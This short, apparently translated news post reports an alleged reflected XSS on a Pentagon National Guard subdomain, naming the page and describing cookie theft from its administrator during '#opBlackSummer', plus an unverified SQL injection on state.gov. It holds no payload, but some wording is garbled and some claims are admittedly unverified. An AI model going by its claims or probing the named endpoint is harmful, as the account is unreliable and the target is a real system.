Reflected XSS on the Pentagon Subdomain (and what it led to)
Hackers from the Tunisian Cyber Army and Al Qaida Electronic Army detected reflected XSS on the Pentagon website subdomain, namely the National Guard subdomain: g1arng.army.pentagon.mil/Pages/Default.ASPX .
With its help, they were able to steal the site administrator’s cookies and gain access to his mail and several critical files. This hacking was carried out with the assistance of Chinese hackers during the operation #opBlackSummer.
This is not the first time that Pentagon sites suffer from hackers, but nevertheless, the reaction of Pentagon administrators is rather sluggish: yesterday Sabari Selvan sent them details of the vulnerability, but it is still there.
Also, according to unverified data, as part of the same operation, #opBlackSummer was compromised by the US State Department - state.gov - using sql injection.
At the time of posting, XSS is still present.
Suddenly someone missed - a landmark article about XSS on the Habr: